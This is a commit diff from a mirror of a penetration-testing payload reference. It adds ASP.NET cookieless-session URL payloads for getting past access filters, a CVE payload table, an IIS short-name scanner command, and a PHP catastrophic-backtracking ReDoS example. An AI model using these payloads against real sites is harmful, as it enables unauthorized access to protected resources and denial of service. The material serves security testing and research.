mirror of
https://github.com/swisskyrepo/PayloadsAllTheThings.git
synced 2024-11-10 07:04:22 +00:00
ASP Cookieless + ReDOS backtrack
This commit is contained in:
parent
67adf75bc2
commit
ded1d95735
2 changed files with 75 additions and 7 deletions
|
@ -14,6 +14,7 @@
|
|||
* [UNC Bypass](#unc-bypass)
|
||||
* [NGINX/ALB Bypass](#nginxalb-bypass)
|
||||
* [ASPNET Cookieless Bypass](#aspnet-cookieless-bypass)
|
||||
* [IIS Short Name](#iis-short-name)
|
||||
* [Path Traversal](#path-traversal)
|
||||
* [Interesting Linux files](#interesting-linux-files)
|
||||
* [Interesting Windows files](#interesting-windows-files)
|
||||
|
@ -110,12 +111,49 @@ When cookieless session state is enabled. Instead of relying on a cookie to iden
|
|||
|
||||
For example, a typical URL might be transformed from: `http://example.com/page.aspx` to something like: `http://example.com/(S(lit3py55t21z5v55vlm25s55))/page.aspx`. The value within `(S(...))` is the Session ID.
|
||||
|
||||
|
||||
| .NET Version | URI |
|
||||
| -------------- | -------------------------- |
|
||||
| V1.0, V1.1 | /(XXXXXXXX)/ |
|
||||
| V2.0+ | /(S(XXXXXXXX))/ |
|
||||
| V2.0+ | /(A(XXXXXXXX)F(YYYYYYYY))/ |
|
||||
| V2.0+ | ... |
|
||||
|
||||
|
||||
We can use this behavior to bypass filtered URLs.
|
||||
|
||||
```powershell
|
||||
* If your application is in the main folder
|
||||
```ps1
|
||||
/(S(X))/
|
||||
/(Y(Z))/
|
||||
/(G(AAA-BBB)D(CCC=DDD)E(0-1))/
|
||||
/(S(X))/admin/(S(X))/main.aspx
|
||||
/(S(x))/b/(S(x))in/Navigator.dll
|
||||
```
|
||||
|
||||
* If your application is in a subfolder
|
||||
```ps1
|
||||
/MyApp/(S(X))/
|
||||
/admin/(S(X))/main.aspx
|
||||
/admin/Foobar/(S(X))/../(S(X))/main.aspx
|
||||
/(S(X))/admin/(S(X))/main.aspx
|
||||
```
|
||||
|
||||
|
||||
| CVE | Payload |
|
||||
| -------------- | ---------------------------------------------- |
|
||||
| CVE-2023-36899 | /WebForm/(S(X))/prot/(S(X))ected/target1.aspx |
|
||||
| - | /WebForm/(S(X))/b/(S(X))in/target2.aspx |
|
||||
| CVE-2023-36560 | /WebForm/pro/(S(X))tected/target1.aspx/(S(X))/ |
|
||||
| - | /WebForm/b/(S(X))in/target2.aspx/(S(X))/ |
|
||||
|
||||
|
||||
### IIS Short Name
|
||||
|
||||
* [irsdl/IIS-ShortName-Scanner](https://github.com/irsdl/IIS-ShortName-Scanner)
|
||||
|
||||
```ps1
|
||||
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/bin::$INDEX_ALLOCATION/'
|
||||
java -jar ./iis_shortname_scanner.jar 20 8 'https://X.X.X.X/MyApp/bin::$INDEX_ALLOCATION/'
|
||||
```
|
||||
|
||||
|
||||
|
@ -236,3 +274,4 @@ The following log files are controllable and can be included with an evil payloa
|
|||
* [Directory traversal - Portswigger](https://portswigger.net/web-security/file-path-traversal)
|
||||
* [Cookieless ASPNET - Soroush Dalili](https://twitter.com/irsdl/status/1640390106312835072)
|
||||
* [EP 057 | Proc filesystem tricks & locatedb abuse with @_remsio_ & @_bluesheet - TheLaluka - 30 nov. 2023](https://youtu.be/YlZGJ28By8U)
|
||||
* [Understand How the ASP.NET Cookieless Feature Works - Microsoft Documentation - 06/24/2011](https://learn.microsoft.com/en-us/previous-versions/dotnet/articles/aa479315(v=msdn.10))
|
|
@ -30,7 +30,36 @@ Evil Regex contains:
|
|||
These regular expressions can be exploited with `aaaaaaaaaaaaaaaaaaaaaaaa!`
|
||||
|
||||
|
||||
### Backtrack Limit
|
||||
|
||||
Backtracking in regular expressions occurs when the regex engine tries to match a pattern and encounters a mismatch. The engine then backtracks to the previous matching position and tries an alternative path to find a match. This process can be repeated many times, especially with complex patterns and large input strings.
|
||||
|
||||
PHP PCRE configuration options
|
||||
|
||||
| Name | Default | Note |
|
||||
|----------------------|---------|---------|
|
||||
| pcre.backtrack_limit | 1000000 | 100000 for `PHP < 5.3.7`|
|
||||
| pcre.recursion_limit | 100000 | / |
|
||||
| pcre.jit | 1 | / |
|
||||
|
||||
|
||||
Sometimes it is possible to force the regex to exceed more than 100 000 recursions which will cause a ReDOS and make `preg_match` returning false:
|
||||
|
||||
```php
|
||||
$pattern = '/(a+)+$/';
|
||||
$subject = str_repeat('a', 1000) . 'b';
|
||||
|
||||
if (preg_match($pattern, $subject)) {
|
||||
echo "Match found";
|
||||
} else {
|
||||
echo "No match";
|
||||
}
|
||||
```
|
||||
|
||||
|
||||
## References
|
||||
|
||||
* [Regular expression Denial of Service - ReDoS - OWASP - Adar Weidman](https://owasp.org/www-community/attacks/Regular_expression_Denial_of_Service_-_ReDoS)
|
||||
* [OWASP Validation Regex Repository - OWASP](https://wiki.owasp.org/index.php/OWASP_Validation_Regex_Repository)
|
||||
* [PHP Manual > Function Reference > Text Processing > PCRE > Installing/Configuring > Runtime Configuration](https://www.php.net/manual/en/pcre.configuration.php#ini.pcre.recursion-limit)
|
||||
* [Intigriti Challenge 1223 - HACKBOOK OF A HACKER](https://simones-organization-4.gitbook.io/hackbook-of-a-hacker/ctf-writeups/intigriti-challenges/1223)
|
Loading…
Reference in a new issue